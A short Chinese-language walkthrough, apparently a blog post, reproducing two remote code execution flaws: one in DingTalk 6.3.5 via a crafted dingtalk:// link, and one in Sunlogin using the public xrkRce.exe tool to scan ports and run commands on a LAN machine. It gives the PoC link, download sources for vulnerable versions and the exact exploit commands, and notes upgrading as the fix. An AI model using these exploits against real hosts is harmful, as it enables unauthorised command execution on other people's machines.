某钉RCE
- 影响版本
6.3.5
- poc
dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true
- 本地使用hsf搭建服务
4. 下载受漏洞影响的版本
链接:https://pan.baidu.com/s/1ozrwoqjzwASgONavgc94OQ
提取码:9bcw
-
公众号回复 hfs 即可获取该工具
-
登录该版本某钉之后,直接发送poc而后点击即可触发
当然了,修复方式极其简单,升级为6.3.30即可(某钉运行结束后会自动升级)
某葵RCE 复现
- 前往github下载受影响的版本
链接:https://pan.baidu.com/s/1O0EY-JRblNuGa8q3mfWxUQ
提取码:XVFD
https://github.com/Mr-xn/sunlogin_rce
- 安装某葵即可,版本如下
- 运行xrkRce.exe工具,需要go环境
xrkRce.exe -h 192.168.43.157 -t scan -p 1-65535
获取可能存在的向日葵端口号
不知道为啥,我扫了三遍才扫到这个端口,所以其实有时候不是没开端口,而是没扫到,可能是受环境影响,所以若是大家扫不到,只需要确定一下向日葵是否开启,而后使用第二种方式去定位该端口号
进入命令行模式后,输入命令 tasklist 可获取正在运行的进程,找到向日葵的进程即可
可以看到,竟然有三个进程,我们查看第一个 30552
netatst -ano | findstr "30552"
顺利找到此端口,而后返回值exp下执行如下命令即可
xrkRce.exe -h 192.168.43.157 -t rce -p 28193 -c "whoami"
修复方式的话,官方已经修复该漏洞,大家升级最新版本即可